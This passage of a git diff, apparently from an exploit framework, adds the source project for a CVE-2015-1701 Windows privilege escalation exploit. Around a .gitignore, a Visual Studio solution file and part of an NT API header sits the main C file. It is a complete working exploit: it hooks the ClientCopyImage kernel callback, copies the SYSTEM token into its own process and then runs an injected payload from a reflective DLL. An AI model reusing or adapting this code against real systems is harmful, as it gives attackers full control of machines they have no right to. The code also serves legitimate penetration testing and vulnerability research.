z{|#{cC^$YFPOpN~YvJ{sX=BpIk&71c(Me8blb5-AZU*UXjyrp3w=|c*6;0a}PwSOL
Y>otb<%Sa1m)7!8d`b5dE|L;Bj54Xs1v;Y7A

literal 0
HcmV?d00001

diff --git a/external/source/exploits/cve-2015-1701/.gitignore b/external/source/exploits/cve-2015-1701/.gitignore
new file mode 100755
index 0000000000..7649d7f46b
--- /dev/null
+++ b/external/source/exploits/cve-2015-1701/.gitignore
@@ -0,0 +1,151 @@
+## Ignore Visual Studio temporary files, build results, and
+## files generated by popular Visual Studio add-ons.
+
+# User-specific files
+*.suo
+*.user
+*.sln.docstates
+
+# Build results
+
+[Dd]ebug/
+[Rr]elease/
+x64/
+build/
+[Bb]in/
+[Oo]bj/
+
+# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
+!packages/*/build/
+
+# MSTest test Results
+[Tt]est[Rr]esult*/
+[Bb]uild[Ll]og.*
+
+*_i.c
+*_p.c
+*.ilk
+*.meta
+*.obj
+*.pch
+*.pdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*.log
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.log
+*.scc
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opensdf
+*.sdf
+*.cachefile
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+
+# Guidance Automation Toolkit
+*.gpState
+
+# ReSharper is a .NET coding add-in
+_ReSharper*/
+*.[Rr]e[Ss]harper
+
+# TeamCity is a build add-in
+_TeamCity*
+
+# DotCover is a Code Coverage Tool
+*.dotCover
+
+# NCrunch
+*.ncrunch*
+.*crunch*.local.xml
+
+# Installshield output folder
+[Ee]xpress/
+
+# DocProject is a documentation generator add-in
+DocProject/buildhelp/
+DocProject/Help/*.HxT
+DocProject/Help/*.HxC
+DocProject/Help/*.hhc
+DocProject/Help/*.hhk
+DocProject/Help/*.hhp
+DocProject/Help/Html2
+DocProject/Help/html
+
+# Click-Once directory
+publish/
+
+# Publish Web Output
+*.Publish.xml
+*.pubxml
+
+# NuGet Packages Directory
+## TODO: If you have NuGet Package Restore enabled, uncomment the next line
+#packages/
+
+# Windows Azure Build Output
+csx
+*.build.csdef
+
+# Windows Store app package directory
+AppPackages/
+
+# Others
+sql/
+*.Cache
+ClientBin/
+[Ss]tyle[Cc]op.*
+~$*
+*~
+*.dbmdl
+*.[Pp]ublish.xml
+*.pfx
+*.publishsettings
+
+# RIA/Silverlight projects
+Generated_Code/
+
+# Backup & report files from converting an old project file to a newer
+# Visual Studio version. Backup files are not needed, because we have git ;-)
+_UpgradeReport_Files/
+Backup*/
+UpgradeLog*.XML
+UpgradeLog*.htm
+
+# SQL Server files
+App_Data/*.mdf
+App_Data/*.ldf
+
+# =========================
+# Windows detritus
+# =========================
+
+# Windows image file caches
+Thumbs.db
+ehthumbs.db
+
+# Folder config file
+Desktop.ini
+
+# Recycle Bin used on file shares
+$RECYCLE.BIN/
+
+# Mac crap
+.DS_Store
diff --git a/external/source/exploits/cve-2015-1701/cve-2015-1701.sln b/external/source/exploits/cve-2015-1701/cve-2015-1701.sln
new file mode 100755
index 0000000000..cb44c647d2
--- /dev/null
+++ b/external/source/exploits/cve-2015-1701/cve-2015-1701.sln
@@ -0,0 +1,28 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 2013
+VisualStudioVersion = 12.0.21005.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{68E70ED4-1C36-46C1-8B45-E7CB546B62CA}") = "cve-2015-1701", "cve-2015-1701\cve-2015-1701.vcxproj", "{24713BA3-D562-41EF-87FC-9D5E44DFF2F8}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Debug|x64 = Debug|x64
+		Release|Win32 = Release|Win32
+		Release|x64 = Release|x64
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{24713BA3-D562-41EF-87FC-9D5E44DFF2F8}.Debug|Win32.ActiveCfg = Debug|Win32
+		{24713BA3-D562-41EF-87FC-9D5E44DFF2F8}.Debug|Win32.Build.0 = Debug|Win32
+		{24713BA3-D562-41EF-87FC-9D5E44DFF2F8}.Debug|x64.ActiveCfg = Debug|x64
+		{24713BA3-D562-41EF-87FC-9D5E44DFF2F8}.Debug|x64.Build.0 = Debug|x64
+		{24713BA3-D562-41EF-87FC-9D5E44DFF2F8}.Release|Win32.ActiveCfg = Release|Win32
+		{24713BA3-D562-41EF-87FC-9D5E44DFF2F8}.Release|Win32.Build.0 = Release|Win32
+		{24713BA3-D562-41EF-87FC-9D5E44DFF2F8}.Release|x64.ActiveCfg = Release|x64
+		{24713BA3-D562-41EF-87FC-9D5E44DFF2F8}.Release|x64.Build.0 = Release|x64
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
diff --git a/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c b/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c
new file mode 100755
index 0000000000..637ddf7cd2
--- /dev/null
+++ b/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c
@@ -0,0 +1,524 @@
+/*******************************************************************************
+*
+*  (C) COPYRIGHT AUTHORS, 2015
+*
+*  TITLE:       MAIN.C
+*
+*  VERSION:     1.00
+*
+*  DATE:        10 May 2015
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+//Disable nonmeaningful warnings.
+#pragma warning(disable: 4005) // macro redefinition
+#pragma warning(disable: 4054) // 'type cast' : from function pointer %s to data pointer %s
+#pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression
+#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
+
+#define _CRT_SECURE_NO_WARNINGS
+#define OEMRESOURCE
+
+#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
+#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
+#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
+
+#include <ntstatus.h>
+#include "cve-2015-1701.h"
+
+#define TYPE_WINDOW 1
+#define HMUNIQSHIFT 16
+
+typedef NTSTATUS (NTAPI *pUser32_ClientCopyImage)(PVOID p);
+typedef NTSTATUS (NTAPI *pPLPBPI)(HANDLE ProcessId, PVOID *Process);
+
+typedef PVOID	PHEAD;
+
+typedef struct _HANDLEENTRY {
+	PHEAD   phead;  // Pointer to the Object.
+	PVOID   pOwner; // PTI or PPI
+	BYTE    bType;  // Object handle type
+	BYTE    bFlags; // Flags
+	WORD    wUniq;  // Access count.
+} HANDLEENTRY, *PHANDLEENTRY;
+
+typedef struct _SERVERINFO {
+	WORD            wRIPFlags;
+	WORD            wSRVIFlags;
+	WORD            wRIPPID;
+	WORD            wRIPError;
+	ULONG           cHandleEntries;
+	// incomplete
+} SERVERINFO, *PSERVERINFO;
+
+typedef struct _SHAREDINFO {
+	PSERVERINFO		psi;
+	PHANDLEENTRY	aheList;
+	ULONG			HeEntrySize;
+	// incomplete
+} SHAREDINFO, *PSHAREDINFO;
+
+static const TCHAR	MAINWINDOWCLASSNAME[] = TEXT("usercls348_Mainwindow");
+
+pPLPBPI						g_PsLookupProcessByProcessIdPtr = NULL;
+pUser32_ClientCopyImage		g_originalCCI = NULL;
+PVOID						g_ppCCI = NULL, g_w32theadinfo = NULL;
+int							g_shellCalled = 0;
+DWORD						g_OurPID;
+DWORD						g_EPROCESS_TokenOffset = 0;
+
+typedef NTSTATUS (NTAPI *PRtlGetVersion)( _Inout_	PRTL_OSVERSIONINFOW lpVersionInformation );
+
+NTSTATUS NTAPI RtlGetVersion(
+	_Inout_	PRTL_OSVERSIONINFOW lpVersionInformation
+	)
+{
+	static PRtlGetVersion proxy = NULL;
+
+	if (proxy == NULL)
+	{
+		proxy = (PRtlGetVersion)GetProcAddress(GetModuleHandle("ntdll"), "RtlGetVersion");
+	}
+
+	return proxy(lpVersionInformation);
+}
+
+typedef NTSTATUS (WINAPI* PNtQuerySystemInformation)(
+	_In_       SYSTEM_INFORMATION_CLASS SystemInformationClass,
+	_Inout_    PVOID SystemInformation,
+	_In_       ULONG SystemInformationLength,
+	_Out_opt_  PULONG ReturnLength
+	);
+
+NTSTATUS WINAPI NtQuerySystemInformation(
+	_In_       SYSTEM_INFORMATION_CLASS SystemInformationClass,
+	_Inout_    PVOID SystemInformation,
+	_In_       ULONG SystemInformationLength,
+	_Out_opt_  PULONG ReturnLength
+	)
+{
+	static PNtQuerySystemInformation proxy = NULL;
+
+	if (proxy == NULL)
+	{
+		proxy = (PNtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll"), "NtQuerySystemInformation");
+	}
+
+	return proxy(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);
+}
+
+typedef NTSTATUS (NTAPI* PNtQueryInformationProcess)(
+	_In_		HANDLE ProcessHandle,
+	_In_		PROCESSINFOCLASS ProcessInformationClass,
+	_Out_		PVOID ProcessInformation,
+	_In_		ULONG ProcessInformationLength,
+	_Out_opt_	PULONG ReturnLength
+	);
+
+NTSTATUS NTAPI NtQueryInformationProcess(
+	_In_		HANDLE ProcessHandle,
+	_In_		PROCESSINFOCLASS ProcessInformationClass,
+	_Out_		PVOID ProcessInformation,
+	_In_		ULONG ProcessInformationLength,
+	_Out_opt_	PULONG ReturnLength
+	)
+{
+	static PNtQueryInformationProcess proxy = NULL;
+
+	if (proxy == NULL)
+	{
+		proxy = (PNtQueryInformationProcess)GetProcAddress(GetModuleHandle("ntdll"), "NtQueryInformationProcess");
+	}
+
+	return proxy(ProcessHandle, ProcessInformationClass, ProcessInformation, ProcessInformationLength, ReturnLength);
+}
+
+DWORD WINAPI execute_payload(LPVOID lpPayload)
+{
+	VOID(*lpCode)() = (VOID(*)())lpPayload;
+	lpCode();
+	return ERROR_SUCCESS;
+}
+
+/*
+* supGetSystemInfo
+*
+* Purpose:
+*
+* Returns buffer with system information by given InfoClass.
+*
+* Returned buffer must be freed with HeapFree after usage.
+* Function will return error after 100 attempts.
+*
+*/
+PVOID supGetSystemInfo(
+	_In_ SYSTEM_INFORMATION_CLASS InfoClass
+	)
+{
+	INT			c = 0;
+	PVOID		Buffer = NULL;
+	ULONG		Size = 0x1000;
+	NTSTATUS	status;
+	ULONG       memIO;
+
+	do {
+		Buffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, Size);
+		if (Buffer != NULL) {
+			status = NtQuerySystemInformation(InfoClass, Buffer, Size, &memIO);
+		}
+		else {
+			return NULL;
+		}
+		if (status == STATUS_INFO_LENGTH_MISMATCH) {
+			HeapFree(GetProcessHeap(), 0, Buffer);
+			Size *= 2;
+		}
+		c++;
+		if (c > 100) {
+			status = STATUS_SECRET_TOO_LONG;
+			break;
+		}
+	} while (status == STATUS_INFO_LENGTH_MISMATCH);
+
+	if (NT_SUCCESS(status)) {
+		return Buffer;
+	}
+
+	if (Buffer) {
+		HeapFree(GetProcessHeap(), 0, Buffer);
+	}
+	return NULL;
+}
+
+/*
+* supIsProcess32bit
+*
+* Purpose:
+*
+* Return TRUE if given process is under WOW64, FALSE otherwise.
+*
+*/
+BOOLEAN supIsProcess32bit(
+	_In_ HANDLE hProcess
+	)
+{
+	NTSTATUS status;
+	PROCESS_EXTENDED_BASIC_INFORMATION pebi;
+
+	if (hProcess == NULL) {
+		return FALSE;
+	}
+
+	//query if this is wow64 process
+	RtlSecureZeroMemory(&pebi, sizeof(pebi));
+	pebi.Size = sizeof(PROCESS_EXTENDED_BASIC_INFORMATION);
+	status = NtQueryInformationProcess(hProcess, ProcessBasicInformation, &pebi, sizeof(pebi), NULL);
+	if (NT_SUCCESS(status)) {
+		return (pebi.IsWow64Process == 1);
+	}
+	return FALSE;
+}
+
+/*
+* GetPsLookupProcessByProcessId
+*
+* Purpose:
+*
+* Return address of PsLookupProcessByProcessId routine to be used next by shellcode.
+*
+*/
+ULONG_PTR GetPsLookupProcessByProcessId(
+	VOID
+	)
+{
+	BOOL						cond = FALSE;
+	ULONG						rl = 0;
+	PVOID						MappedKernel = NULL;
+	ULONG_PTR					KernelBase = 0L, FuncAddress = 0L;
+	PRTL_PROCESS_MODULES		miSpace = NULL;
+	CHAR						KernelFullPathName[MAX_PATH * 2];
+
+
+	do {
+
+		miSpace = supGetSystemInfo(SystemModuleInformation);
+		if (miSpace == NULL) {
+			break;
+		}
+
+		if (miSpace->NumberOfModules == 0) {
+			break;
+		}
+
+		rl = GetSystemDirectoryA(KernelFullPathName, MAX_PATH);
+		if (rl == 0) {
+			break;
+		}
+
+		KernelFullPathName[rl] = (CHAR)'\\';
+		strcpy(&KernelFullPathName[rl + 1],
+			(const char*)&miSpace->Modules[0].FullPathName[miSpace->Modules[0].OffsetToFileName]);
+		KernelBase = (ULONG_PTR)miSpace->Modules[0].ImageBase;
+		HeapFree(GetProcessHeap(), 0, miSpace);
+		miSpace = NULL;
+
+		MappedKernel = LoadLibraryExA(KernelFullPathName, NULL, DONT_RESOLVE_DLL_REFERENCES);
+		if (MappedKernel == NULL) {
+			break;
+		}
+
+		FuncAddress = (ULONG_PTR)GetProcAddress(MappedKernel, "PsLookupProcessByProcessId");
+		FuncAddress = KernelBase + FuncAddress - (ULONG_PTR)MappedKernel;
+
+	} while (cond);
+
+	if (MappedKernel != NULL) {
+		FreeLibrary(MappedKernel);
+	}
+	if (miSpace != NULL) {
+		HeapFree(GetProcessHeap(), 0, miSpace);
+	}
+
+	return FuncAddress;
+}
+
+/*
+* GetFirstThreadHWND
+*
+* Purpose:
+*
+* Locate, convert and return hwnd for current thread from SHAREDINFO->aheList.
+*
+*/
+HWND GetFirstThreadHWND(
+	VOID
+	)
+{
+	PSHAREDINFO		pse;
+	HMODULE			huser32;
+	PHANDLEENTRY	List;
+	ULONG_PTR		c, k;
+
+	huser32 = GetModuleHandle(TEXT("user32.dll"));
+	if (huser32 == NULL)
+		return 0;
+
+	pse = (PSHAREDINFO)GetProcAddress(huser32, "gSharedInfo");
+	if (pse == NULL)
+		return 0;
+
+	List = pse->aheList;
+	k = pse->psi->cHandleEntries;
+
+	if (pse->HeEntrySize != sizeof(HANDLEENTRY))
+		return 0;
+
+	//
+	// Locate, convert and return hwnd for current thread.
+	//
+	for (c = 0; c < k; c++)
+		if ((List[c].pOwner == g_w32theadinfo) && (List[c].bType == TYPE_WINDOW)) {
+			return (HWND)(c | (((ULONG_PTR)List[c].wUniq) << HMUNIQSHIFT));
+		}
+
+	return 0;
+}
+
+/*
+* StealProcessToken
+*
+* Purpose:
+*
+* Copy system token to current process object.
+*
+*/
+NTSTATUS NTAPI StealProcessToken(
+	VOID
+	)
+{
+	NTSTATUS Status;
+	PVOID CurrentProcess = NULL;
+	PVOID SystemProcess = NULL;
+
+	Status = g_PsLookupProcessByProcessIdPtr((HANDLE)g_OurPID, &CurrentProcess);
+	if (NT_SUCCESS(Status)) {
+		Status = g_PsLookupProcessByProcessIdPtr((HANDLE)4, &SystemProcess);
+		if (NT_SUCCESS(Status)) {
+			if (g_EPROCESS_TokenOffset) {
+				*(PVOID *)((PBYTE)CurrentProcess + g_EPROCESS_TokenOffset) = *(PVOID *)((PBYTE)SystemProcess + g_EPROCESS_TokenOffset);
+			}
+		}
+	}
+	return Status;
+}
+
+
+/*
+* MainWindowProc
+*
+* Purpose:
+*
+* To be called in ring0.
+*
+*/
+LRESULT CALLBACK MainWindowProc(
+	_In_ HWND hwnd,
+	_In_ UINT uMsg,
+	_In_ WPARAM wParam,
+	_In_ LPARAM lParam
+	)
+{
+	UNREFERENCED_PARAMETER(hwnd);
+	UNREFERENCED_PARAMETER(uMsg);
+	UNREFERENCED_PARAMETER(wParam);
+	UNREFERENCED_PARAMETER(lParam);
+
+	if (g_shellCalled == 0) {
+		StealProcessToken();
+		g_shellCalled = 1;
+	}
+
+	return 0;
+}
+
+/*
+* hookCCI
+*
+* Purpose:
+*
+* _ClientCopyImage hook handler.
+*
+*/
+NTSTATUS NTAPI hookCCI(
+	PVOID p
+	)
+{
+	InterlockedExchangePointer(g_ppCCI, g_originalCCI); //restore original callback
+
+	SetWindowLongPtr(GetFirstThreadHWND(), GWLP_WNDPROC, (LONG_PTR)&DefWindowProc);
+
+	return g_originalCCI(p);
+}
+
+void win32k_client_copy_image(LPVOID lpPayload)
+{
+
+	PTEB			teb = NtCurrentTeb();
+	PPEB			peb = teb->ProcessEnvironmentBlock;
+	WNDCLASSEX		wincls;
+	HINSTANCE		hinst = GetModuleHandle(NULL);
+	BOOL			rv = TRUE;
+	MSG				msg1;
+	ATOM			class_atom;
+	HWND			MainWindow;
+	DWORD			prot;
+	OSVERSIONINFOW	osver;
+
+	RtlSecureZeroMemory(&osver, sizeof(osver));
+	osver.dwOSVersionInfoSize = sizeof(osver);
+	RtlGetVersion(&osver);
+	
+	if (osver.dwBuildNumber > 7601) {
+		ExitProcess((UINT)-1);
+		return;
+	}
+
+	if (supIsProcess32bit(GetCurrentProcess())) {
+		ExitProcess((UINT)-2);
+		return;
+	}
+
+	g_OurPID = GetCurrentProcessId();
+	g_PsLookupProcessByProcessIdPtr = (PVOID)GetPsLookupProcessByProcessId();
+
+#ifdef _WIN64
+	g_EPROCESS_TokenOffset = 0x208;
+#else
+	g_EPROCESS_TokenOffset = 0xF8;
+#endif
+
+
+	if (g_PsLookupProcessByProcessIdPtr == NULL) {
+		ExitProcess((UINT)-3);
+		return;
+	}
+
+	RtlSecureZeroMemory(&wincls, sizeof(wincls));
+	wincls.cbSize = sizeof(WNDCLASSEX);
+	wincls.lpfnWndProc = &MainWindowProc;
+	wincls.hIcon = LoadIcon(NULL, IDI_APPLICATION);
+	wincls.lpszClassName = MAINWINDOWCLASSNAME;
+
+	class_atom = RegisterClassEx(&wincls);
+	while (class_atom) {
+		g_w32theadinfo = teb->Win32ThreadInfo;
+
+		g_ppCCI = &((PVOID *)peb->KernelCallbackTable)[0x36]; //  <--- User32_ClientCopyImage INDEX
+	
+		if (!VirtualProtect(g_ppCCI, sizeof(PVOID), PAGE_EXECUTE_READWRITE, &prot)) {
+			break;
+		}
+		g_originalCCI = InterlockedExchangePointer(g_ppCCI, &hookCCI);
+
+		MainWindow = CreateWindowEx(0, MAKEINTATOM(class_atom),
+			NULL, 0, 0, 0, 0, 0, NULL, NULL, NULL, NULL);
+
+		if (g_shellCalled == 1)
+		{
+			execute_payload(lpPayload);
+		}
+		else {
+			OutputDebugString(TEXT(" Failed \r\n"));
+		}
+
+		if (!MainWindow) {
+			break;
+		}
+
+		do {
+			rv = GetMessage(&msg1, NULL, 0, 0);
+
+			if (rv == -1)
+				break;
+
+			TranslateMessage(&msg1);
+			DispatchMessage(&msg1);
+		} while (rv != 0);
+
+		break;
+	}
+
+	if (class_atom)
+		UnregisterClass(MAKEINTATOM(class_atom), hinst);
+
+	ExitProcess(0);
+}
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
+{
+	BOOL bReturnValue = TRUE;
+	switch (dwReason)
+	{
+	case DLL_QUERY_HMODULE:
+		hAppInstance = hinstDLL;
+		if (lpReserved != NULL)
+		{
+			*(HMODULE *)lpReserved = hAppInstance;
+		}
+		break;
+	case DLL_PROCESS_ATTACH:
+		hAppInstance = hinstDLL;
+		win32k_client_copy_image(lpReserved);
+		break;
+	case DLL_PROCESS_DETACH:
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+		break;
+	}
+	return bReturnValue;
+}
diff --git a/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.h b/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.h
new file mode 100755
index 0000000000..7111a6ba52
--- /dev/null
+++ b/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.h
@@ -0,0 +1,3887 @@
+/************************************************************************************
+*
+*  (C) COPYRIGHT AUTHORS, 2015, translated from Microsoft sources/debugger
+*
+*  TITLE:       NTOS.H
+*
+*  VERSION:     1.17
+*
+*  DATE:        24 Apr 2015
+*
+*  Common header file for the ntos API functions and definitions.
+*
+*  ONLY program required types and definitions listed.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+************************************************************************************/
+
+//#pragma comment(lib, "ntdll.lib")
+
+#pragma warning(disable: 4214) // nonstandard extension used : bit field types other than int
+
+#define IN_REGION(x, Base, Size) (((ULONG_PTR)x >= (ULONG_PTR)Base) && ((ULONG_PTR)x <= (ULONG_PTR)Base + (ULONG_PTR)Size))
+
+#define ALIGN_DOWN(count,size) \
+            ((ULONG_PTR)(count) & ~((ULONG_PTR)(size) - 1))
+
+#define ALIGN_UP(count,size) \
+            (ALIGN_DOWN( (ULONG_PTR)(count)+(ULONG_PTR)(size)-1, (ULONG_PTR)(size) ))
+
+//Access Rights
+
+#define CALLBACK_MODIFY_STATE    0x0001
+#define CALLBACK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|CALLBACK_MODIFY_STATE )
+
+#define DEBUG_READ_EVENT        (0x0001)
+#define DEBUG_PROCESS_ASSIGN    (0x0002)
+#define DEBUG_SET_INFORMATION   (0x0004)
+#define DEBUG_QUERY_INFORMATION (0x0008)
+#define DEBUG_ALL_ACCESS     (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|DEBUG_READ_EVENT|DEBUG_PROCESS_ASSIGN|\
+                              DEBUG_SET_INFORMATION|DEBUG_QUERY_INFORMATION)
+
+#define DIRECTORY_QUERY                 (0x0001)
+#define DIRECTORY_TRAVERSE              (0x0002)
+#define DIRECTORY_CREATE_OBJECT         (0x0004)
+#define DIRECTORY_CREATE_SUBDIRECTORY   (0x0008)
+#define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF)
+
+#define EVENT_QUERY_STATE       0x0001
+#define EVENT_MODIFY_STATE      0x0002  
+#define EVENT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3) 
+
+#define EVENT_PAIR_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE)
+
+#define IO_COMPLETION_QUERY_STATE   0x0001
+#define IO_COMPLETION_MODIFY_STATE  0x0002  
+#define IO_COMPLETION_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3) 
+
+#define KEYEDEVENT_WAIT 0x0001
+#define KEYEDEVENT_WAKE 0x0002
+#define KEYEDEVENT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | KEYEDEVENT_WAIT | KEYEDEVENT_WAKE)
+
+#define MUTANT_QUERY_STATE      0x0001
+#define MUTANT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|MUTANT_QUERY_STATE)
+
+#define PORT_CONNECT (0x0001)
+#define PORT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0x1)
+
+#define PROFILE_CONTROL (0x0001)
+#define PROFILE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | PROFILE_CONTROL)
+
+#define SEMAPHORE_QUERY_STATE       0x0001
+#define SEMAPHORE_MODIFY_STATE      0x0002 
+#define SEMAPHORE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3)
+
+#define SYMBOLIC_LINK_QUERY (0x0001)
+#define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1)
+
+#define THREAD_ALERT	(0x0004)
+
+#define WORKER_FACTORY_RELEASE_WORKER 0x0001
+#define WORKER_FACTORY_WAIT 0x0002
+#define WORKER_FACTORY_SET_INFORMATION 0x0004
+#define WORKER_FACTORY_QUERY_INFORMATION 0x0008
+#define WORKER_FACTORY_READY_WORKER 0x0010
+#define WORKER_FACTORY_SHUTDOWN 0x0020
+
+#define OBJECT_TYPE_CREATE (0x0001)
+#define OBJECT_TYPE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1)
+
+#define WMIGUID_QUERY                 0x0001
+#define WMIGUID_SET                   0x0002
+#define WMIGUID_NOTIFICATION          0x0004
+#define WMIGUID_READ_DESCRIPTION      0x0008
+#define WMIGUID_EXECUTE               0x0010
+#define TRACELOG_CREATE_REALTIME      0x0020
+#define TRACELOG_CREATE_ONDISK        0x0040
+#define TRACELOG_GUID_ENABLE          0x0080
+#define TRACELOG_ACCESS_KERNEL_LOGGER 0x0100
+#define TRACELOG_CREATE_INPROC        0x0200
+#define TRACELOG_ACCESS_REALTIME      0x0400
+#define TRACELOG_REGISTER_GUIDS       0x0800
+
+//
+// This is the maximum MaximumLength for a UNICODE_STRING.
+//
+
+#define MAXUSHORT   0xffff     
+#define MAX_USTRING ( sizeof(WCHAR) * (MAXUSHORT/sizeof(WCHAR)) )
+
+typedef __success(return >= 0) LONG NTSTATUS;
+typedef NTSTATUS *PNTSTATUS;
+
+typedef struct _UNICODE_STRING {
+	USHORT Length;
+	USHORT MaximumLength;
+	PWSTR  Buffer;
+} UNICODE_STRING;
+typedef UNICODE_STRING *PUNICODE_STRING;
+typedef const UNICODE_STRING *PCUNICODE_STRING;
+
+typedef struct _STRING
+{
+	USHORT Length;
+	USHORT MaximumLength;
+	PCHAR Buffer;
+} STRING;
+typedef STRING *PSTRING;
+
+typedef STRING ANSI_STRING;
+typedef PSTRING PANSI_STRING;
+
+typedef STRING OEM_STRING;
+typedef PSTRING POEM_STRING;
+typedef CONST STRING* PCOEM_STRING;
+typedef CONST char *PCSZ;
+
+typedef struct _CSTRING
+{
+	USHORT Length;
+	USHORT MaximumLength;
+	CONST char *Buffer;
+} CSTRING;
+typedef CSTRING *PCSTRING;
+#define ANSI_NULL ((CHAR)0)
+
+typedef STRING CANSI_STRING;
+typedef PSTRING PCANSI_STRING;
+
+typedef struct _OBJECT_ATTRIBUTES {
+	ULONG Length;
+	HANDLE RootDirectory;
+	PUNICODE_STRING ObjectName;
+	ULONG Attributes;
+	PVOID SecurityDescriptor;
+	PVOID SecurityQualityOfService;
+} OBJECT_ATTRIBUTES;
+typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;
+
+typedef struct _IO_STATUS_BLOCK {
+	union {
+		NTSTATUS Status;
+		PVOID Pointer;
+	} DUMMYUNIONNAME;
+
+	ULONG_PTR Information;
+} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
+
+/*
+** Semaphore START
+*/
+
+#ifndef _SEMAPHORE_INFORMATION_CLASS
+typedef enum _SEMAPHORE_INFORMATION_CLASS {
+	SemaphoreBasicInformation
+} SEMAPHORE_INFORMATION_CLASS;
+#endif
+
+#ifndef _SEMAPHORE_BASIC_INFORMATION
+typedef struct _SEMAPHORE_BASIC_INFORMATION {
+	LONG CurrentCount;
+	LONG MaximumCount;
+} SEMAPHORE_BASIC_INFORMATION, *PSEMAPHORE_BASIC_INFORMATION;
+#endif
+
+/*
+** Semaphore END
+*/
+
+/*
+** Processes START
+*/
+
+#ifndef KPRIORITY
+typedef LONG KPRIORITY;
+#endif
+
+typedef enum _THREAD_STATE {
+	StateInitialized,
+	StateReady,
+	StateRunning,
+	StateStandby,
+	StateTerminated,
+	StateWait,
+	StateTransition,
+	StateUnknown
+} THREAD_STATE;
+
+typedef enum _KWAIT_REASON {
+	Executive,
+	FreePage,
+	PageIn,
+	PoolAllocation,
+	DelayExecution,
+	Suspended,
+	UserRequest,
+	WrExecutive,
+	WrFreePage,
+	WrPageIn,
+	WrPoolAllocation,
+	WrDelayExecution,
+	WrSuspended,
+	WrUserRequest,
+	WrEventPair,
+	WrQueue,
+	WrLpcReceive,
+	WrLpcReply,
+	WrVirtualMemory,
+	WrPageOut,
+	WrRendezvous,
+	WrKeyedEvent,
+	WrTerminated,
+	WrProcessInSwap,
+	WrCpuRateControl,
+	WrCalloutStack,
+	WrKernel,
+	WrResource,
+	WrPushLock,
+	WrMutex,
+	WrQuantumEnd,
+	WrDispatchInt,
+	WrPreempted,
+	WrYieldExecution,
+	WrFastMutex,
+	WrGuardedMutex,
+	WrRundown,
+	MaximumWaitReason
+} KWAIT_REASON;
+
+typedef struct _CLIENT_ID {
+	HANDLE UniqueProcess;
+	HANDLE UniqueThread;
+} CLIENT_ID, *PCLIENT_ID;
+
+typedef struct _VM_COUNTERS {
+	SIZE_T PeakVirtualSize;
+	SIZE_T VirtualSize;
+	ULONG PageFaultCount;
+	SIZE_T PeakWorkingSetSize;
+	SIZE_T WorkingSetSize;
+	SIZE_T QuotaPeakPagedPoolUsage;
+	SIZE_T QuotaPagedPoolUsage;
+	SIZE_T QuotaPeakNonPagedPoolUsage;
+	SIZE_T QuotaNonPagedPoolUsage;
+	SIZE_T PagefileUsage;
+	SIZE_T PeakPagefileUsage;
+	SIZE_T PrivatePageCount;
+} VM_COUNTERS;
+
+typedef struct _SYSTEM_THREAD_INFORMATION {
+	LARGE_INTEGER   KernelTime;
+	LARGE_INTEGER   UserTime;
+	LARGE_INTEGER   CreateTime;
+	ULONG           WaitTime;
+	PVOID           StartAddress;
